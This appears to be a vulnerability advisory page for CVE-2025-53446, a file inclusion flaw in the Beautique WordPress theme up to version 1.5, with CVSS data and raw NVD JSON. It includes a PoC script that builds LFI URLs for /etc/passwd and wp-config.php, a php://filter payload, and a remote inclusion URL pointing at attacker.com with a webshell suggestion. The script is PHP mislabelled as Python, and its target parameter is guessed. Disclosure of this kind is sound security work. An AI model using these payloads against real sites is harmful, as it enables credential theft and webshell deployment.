Security Vulnerability Report
中文
CVE-2025-53446 CVSS 8.1 HIGH

CVE-2025-53446

Published: 2025-12-18 08:15:55
Last Modified: 2026-01-20 15:16:58

Description

Improper Control of Filename for Include/Require Statement in PHP Program ('PHP Remote File Inclusion') vulnerability in axiomthemes Beautique beautique allows PHP Local File Inclusion.This issue affects Beautique: from n/a through <= 1.5.

CVSS Details

CVSS Score
8.1
Severity
HIGH
CVSS Vector
CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H

Configurations (Affected Products)

cpe:2.3:a:axiomthemes:beautique:*:*:*:*:*:wordpress:*:* - VULNERABLE
Beautique主题 <= 1.5 (所有版本)

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
<?php /** * CVE-2025-53446 PoC - Beautique Theme Local File Inclusion * Target: axiomthemes Beautique WordPress Theme <= 1.5 * Type: PHP Local File Inclusion / Remote File Inclusion * CVSS: 8.1 (High) * * Usage: php cve-2025-53446.py <target_url> <vulnerable_param> * Example: php cve-2025-53446.py http://target.com/ 'template' */ $target_url = $argv[1] ?? 'http://localhost/'; $vuln_param = $argv[2] ?? 'template'; // PoC 1: Read local file (LFI) $lfi_payload = '../../../../etc/passwd'; $lfi_url = $target_url . '?' . $vuln_param . '=' . urlencode($lfi_payload); // PoC 2: Read WordPress config (LFI) $config_payload = '../../../../wp-config.php'; $config_url = $target_url . '?' . $vuln_param . '=' . urlencode($config_payload); // PoC 3: Use php://filter to read source $filter_payload = 'php://filter/read=convert.base64-encode/resource=index.php'; $filter_url = $target_url . '?' . $vuln_param . '=' . urlencode($filter_payload); // PoC 4: Remote code execution (RFI) - attacker controlled server $remote_payload = 'http://attacker.com/malicious.txt'; $rce_url = $target_url . '?' . $vuln_param . '=' . urlencode($remote_payload); echo "CVE-2025-53446 Beautique Theme LFI/RFI PoC\n"; echo "=" . str_repeat("=", 50) . "\n\n"; echo "LFI - Read /etc/passwd:\n" . $lfi_url . "\n\n"; echo "LFI - Read wp-config.php:\n" . $config_url . "\n\n"; echo "LFI - Read source via php://filter:\n" . $filter_url . "\n\n"; echo "RCE - Remote file inclusion:\n" . $rce_url . "\n\n"; echo "Note: Replace malicious.txt with PHP webshell on your server\n"; ?>

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-53446", "sourceIdentifier": "[email protected]", "published": "2025-12-18T08:15:55.017", "lastModified": "2026-01-20T15:16:57.767", "vulnStatus": "Modified", "cveTags": [], "descriptions": [{"lang": "en", "value": "Improper Control of Filename for Include/Require Statement in PHP Program ('PHP Remote File Inclusion') vulnerability in axiomthemes Beautique beautique allows PHP Local File Inclusion.This issue affects Beautique: from n/a through <= 1.5."}], "metrics": {"cvssMetricV31": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", "baseScore": 8.1, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "HIGH", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 2.2, "impactScore": 5.9}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-98"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:axiomthemes:beautique:*:*:*:*:*:wordpress:*:*", "versionEndIncluding": "1.5", "matchCriteriaId": "83B51342-082F-4D25-948A-1906E8650B29"}]}]}], "references": [{"url": "https://patchstack.com/database/Wordpress/Theme/beautique/vulnerability/wordpress-beautique-theme-1-5-local-file-inclusion-vulnerability?_s_id=cve", "source": "[email protected]"}]}}